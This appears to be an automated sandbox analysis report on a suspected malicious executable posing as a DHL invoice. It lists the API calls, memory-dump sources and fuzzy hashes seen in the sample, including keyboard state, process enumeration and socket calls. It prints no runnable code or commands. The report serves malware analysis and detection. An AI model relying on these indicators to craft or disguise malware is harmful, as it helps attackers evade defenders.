• Instruction ID: 7aff7f628fe8d37d735bfad4391065f33ac8b6b1b30bc84e8cc53f73a63405f5
• Opcode Fuzzy Hash: a0442feec99f3f3b1edf5e39ea79fb409f6be6ac1a0ce769fd78c2a38367db28
• Instruction Fuzzy Hash: 1A411976900218BFDF11DBA4DD85EEEBBB8AF09700F104099FA55BB181DB706E45CBA1
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe,00000104), ref: 00361769
• _free.LIBCMT ref: 00361834
• _free.LIBCMT ref: 0036183E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe
• API String ID: 2506810119-911722430
• Opcode ID: 159f272cd527022671e5e495871a60463cfd350944dad346f3c5ea2c8e839bdc
• Instruction ID: c317a8b2fc711ad3273c61253e9826ea5b29ea32b00640d5d325b23abcc850fd
• Opcode Fuzzy Hash: 159f272cd527022671e5e495871a60463cfd350944dad346f3c5ea2c8e839bdc
• Instruction Fuzzy Hash: 57316275A00218AFDB22DF99D885D9EBBFCEB85310F1981AAF804EB215D7705E40DB94
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003CCC08,00000000,?,?,?,?), ref: 003C44AA
• GetWindowLongW.USER32 ref: 003C44C7
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C44D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 12c1191efdf9e1eee3a55adff5cc993c91925e73c5cfdcea5afa82250c9191e3
• Instruction ID: f6367b859199bf80929edfaf55b922dadda588c3dae33a05f67c332d0c13406f
• Opcode Fuzzy Hash: 12c1191efdf9e1eee3a55adff5cc993c91925e73c5cfdcea5afa82250c9191e3
• Instruction Fuzzy Hash: 4B319C31210605AFDB269E38DC45FEA7BA9EB09334F214319F979D21E0DB70EC509750
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 003C461F
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C4634
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: MessageSend
• String ID: '$xV
• API String ID: 3850602802-1488752359
• Opcode ID: b3fdd9dbdf9bd3fcc9df18c858fb1b2cae54f3371888b0c0e841733c03f015f1
• Instruction ID: dddf9b455e1026c7b5cf68a53eea927bd23222a3fff046d2d862bad0a600bf5f
• Opcode Fuzzy Hash: b3fdd9dbdf9bd3fcc9df18c858fb1b2cae54f3371888b0c0e841733c03f015f1
• Instruction Fuzzy Hash: 62311774A002099FDB15CF69C990FDABBB5FB49300F14406AE904EB351D770AD51CF90
APIs
• SysReAllocString.OLEAUT32(?,?), ref: 00396EED
• VariantCopyInd.OLEAUT32(?,?), ref: 00396F08
• VariantClear.OLEAUT32(?), ref: 00396F12
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Variant$AllocClearCopyString
• String ID: *j9
• API String ID: 2173805711-176951553
• Opcode ID: 315bd389031dfa11f3dec907a98e481934f60fd4baac8bf3d61a33e8bd8c563f
• Instruction ID: b705bf688e54ef7a59d5206405f44eb6e8233ac1f4022b5bf0502d312d95d3a5
• Opcode Fuzzy Hash: 315bd389031dfa11f3dec907a98e481934f60fd4baac8bf3d61a33e8bd8c563f
• Instruction Fuzzy Hash: 7C319172605245DFCF0BAFA4E8929BE77B9EF85300F101499F9038F2A1C7349926DB90
APIs
  • Part of subcall function 003B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,003B3077,?,?), ref: 003B3378
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
• _wcslen.LIBCMT ref: 003B309B
• htons.WSOCK32(00000000,?,?,00000000), ref: 003B3106
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
• Opcode ID: 6c2f71c9510aae49f6c3d38aaa2a82d38e2e133de297ee3aee945aadb3528b4c
• Instruction ID: b63b7ab4c1a28d079f260f7bd3f77169783fbd3594a0f15045c1865112225825
• Opcode Fuzzy Hash: 6c2f71c9510aae49f6c3d38aaa2a82d38e2e133de297ee3aee945aadb3528b4c
• Instruction Fuzzy Hash: F43104396042159FC712EF28C881EAA77E4EF1431CF258059EA168FB92CB32EE41C760
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _wcslen
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 176396367-2734436370
• Opcode ID: 900cd606f0d222816a7471ca43508eed7c0678dabb24e44b018d7f4a5a09c656
• Instruction ID: 852d1bb2330312b9ce79dd4fe663ebd2cdac7eede3c81f5f8a4493415198c018
• Opcode Fuzzy Hash: 900cd606f0d222816a7471ca43508eed7c0678dabb24e44b018d7f4a5a09c656
• Instruction Fuzzy Hash: 3521F67210451166DB33AB2C9802FB7B3AC9F52320F15402FF9499B151EB51AD85C3D5
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003C3840
                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003C3850
                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003C3876
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                        • String ID: Listbox
                                                                                                                        • API String ID: 3315199576-2633736733
APIs
• SetErrorMode.KERNEL32(00000001), ref: 003A4A08
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003A4A5C
• SetErrorMode.KERNEL32(00000000,?,?,003CCC08), ref: 003A4AD0
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003C424F
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003C4264
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003C4271
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
  • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
  • Part of subcall function 00392DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
  • Part of subcall function 00392DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
  • Part of subcall function 00392DA7: GetCurrentThreadId.KERNEL32 ref: 00392DDD
  • Part of subcall function 00392DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
• GetFocus.USER32 ref: 00392F78
  • Part of subcall function 00392DEE: GetParent.USER32(00000000), ref: 00392DF9
• GetClassNameW.USER32(?,?,00000100), ref: 00392FC3
• EnumChildWindows.USER32(?,0039303B), ref: 00392FEB
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003C58C1
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003C58EE
• DrawMenuBar.USER32(?), ref: 003C58FD
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
APIs
• GetForegroundWindow.USER32(?,004018B0,003CA364,000000FC,?,00000000,00000000,?,?,?,003876CF,?,?,?,?,?), ref: 003C7805
• GetFocus.USER32 ref: 003C780D
  • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
  • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
• SendMessageW.USER32(00E8E8F0,000000B0,000001BC,000001C0), ref: 003C787A
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: xV
• API String ID: 3601265619-2513823414
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: Variant$ClearInitInitializeUninitialize
• String ID:
• API String ID: 1998397398-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003CFC08,?), ref: 003905F0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003CFC08,?), ref: 00390608
• CLSIDFromProgID.OLE32(?,?,00000000,003CCC40,000000FF,?,00000000,00000800,00000000,?,003CFC08,?), ref: 0039062D
• _memcmp.LIBVCRUNTIME ref: 0039064E
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314563124-0
                                                                                                                        • Opcode ID: a30ef32ad6bd7fb85104252263d7dc0ac8a43f6c8eb903290f48e436199a26b6
                                                                                                                        • Instruction ID: 0287adb3b0a8273f18655b74248f4e2e641db73bac277d11af275b843eaba305
                                                                                                                        • Opcode Fuzzy Hash: a30ef32ad6bd7fb85104252263d7dc0ac8a43f6c8eb903290f48e436199a26b6
                                                                                                                        • Instruction Fuzzy Hash: 7E81F675A00209EFCF05DF94C984EEEB7B9FF89315F214598E506AB250DB71AE06CB60
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: b84fdce10d1dcad321e00ab847630717fe4d71d23673e7a102a4a0aad89472c3
                                                                                                                        • Instruction ID: 6041e57726239dbaba713a191d0e20426d6defc1c0e24752aac5c2629aff34e0
                                                                                                                        • Opcode Fuzzy Hash: b84fdce10d1dcad321e00ab847630717fe4d71d23673e7a102a4a0aad89472c3
                                                                                                                        • Instruction Fuzzy Hash: B6415C77A00100ABDB376BBE8C46AAE3AB9EF42370F15C625F81DDB191E67848419361
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 003B1AFD
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B1B0B
                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003B1B8A
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B1B94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$socket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1881357543-0
                                                                                                                        • Opcode ID: a72fa48615186b59f189936bf2c316f89373f2c531d6e7cfb210b72e89ccf3dc
                                                                                                                        • Instruction ID: 07ac6be2a5e29c12fe5d4e7674b787a493be236ba31983b77a861808f7381009
                                                                                                                        • Opcode Fuzzy Hash: a72fa48615186b59f189936bf2c316f89373f2c531d6e7cfb210b72e89ccf3dc
                                                                                                                        • Instruction Fuzzy Hash: 4441D074600200AFE722EF24C896F6A77E5AB44718F54C44CFA1A9F7D2D772ED418B90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9a638526fe37b4432196e789eb32d7c35dc50707121ee435eec43fd61e11d368
                                                                                                                        • Instruction ID: 5d371bf01c63108c4d131a37dc13f0b10445012ff5e954affca1449b54e20483
                                                                                                                        • Opcode Fuzzy Hash: 9a638526fe37b4432196e789eb32d7c35dc50707121ee435eec43fd61e11d368
                                                                                                                        • Instruction Fuzzy Hash: 28413876A00314AFD727AF38CC41BAABBA9EF84710F10C52AF546DF692D77199418B80
                                                                                                                        APIs
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003A5783
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 003A57A9
                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003A57CE
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003A57FA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3321077145-0
                                                                                                                        • Opcode ID: 19a8504edf2f6c50d4cc1ac35020d059488f5fd39784ec14cb735979ac2962ec
                                                                                                                        • Instruction ID: 327de44f164d823fab64d5e995d4a68a861ff5bf2da3962d56f0585643aeb1d4
                                                                                                                        • Opcode Fuzzy Hash: 19a8504edf2f6c50d4cc1ac35020d059488f5fd39784ec14cb735979ac2962ec
                                                                                                                        • Instruction Fuzzy Hash: 3D411C3A600610DFDB26DF15C484A19BBE5EF4A720F198488E84AAF362CB35FD00CB91
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00356D71,00000000,00000000,003582D9,?,003582D9,?,00000001,00356D71,?,00000001,003582D9,003582D9), ref: 0036D910
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0036D999
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0036D9AB
                                                                                                                        • __freea.LIBCMT ref: 0036D9B4
                                                                                                                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2652629310-0
                                                                                                                        • Opcode ID: c24c39175d5dffa5880bdb20348a379384826065f72090ec39f2548dc30fbdda
                                                                                                                        • Instruction ID: 8d628887c00fc4b98165a23cb6f0c892c5b4c72468bf6b198b5339dbb5599a8c
                                                                                                                        • Opcode Fuzzy Hash: c24c39175d5dffa5880bdb20348a379384826065f72090ec39f2548dc30fbdda
                                                                                                                        • Instruction Fuzzy Hash: 6431B072A0020AABDF269F65DC45EAF7BA9EB41310F068168FC04DB154EB35DD54CB90
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0039ABF1
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0039AC0D
                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0039AC74
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0039ACC6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: e1c6819ac7d299b80c0e73a400b88580ae774e7473eb7648a0d936d82729d169
                                                                                                                        • Instruction ID: 21afedfea06e8f520edcd6008992c66a827fa43bb577a5806e30657b10680d71
                                                                                                                        • Opcode Fuzzy Hash: e1c6819ac7d299b80c0e73a400b88580ae774e7473eb7648a0d936d82729d169
                                                                                                                        • Instruction Fuzzy Hash: B1313970A04B186FFF37CB698C04BFA7BA9AB85311F04471AE485DA1D0C37499818BD2
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 003C16EB
                                                                                                                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                                                                                                                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                                                                                                                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                                                                                                                        • GetCaretPos.USER32(?), ref: 003C16FF
                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 003C174C
                                                                                                                        • GetForegroundWindow.USER32 ref: 003C1752
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2759813231-0
                                                                                                                        • Opcode ID: 9f848b59ad7cc6362cd0cc167655cebade54c9d136c934e9b351ffae2ac5fe88
                                                                                                                        • Instruction ID: d05d3caa42a03390d0c504ba2700c006c6276f29784361a6ee7883597e723079
                                                                                                                        • Opcode Fuzzy Hash: 9f848b59ad7cc6362cd0cc167655cebade54c9d136c934e9b351ffae2ac5fe88
                                                                                                                        • Instruction Fuzzy Hash: 06313075D00149AFCB05EFA9C8C5DAEB7FDEF49304B5080A9E415EB212D631AE45CFA0
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0039D501
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0039D50F
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0039D52F
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0039D5DC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
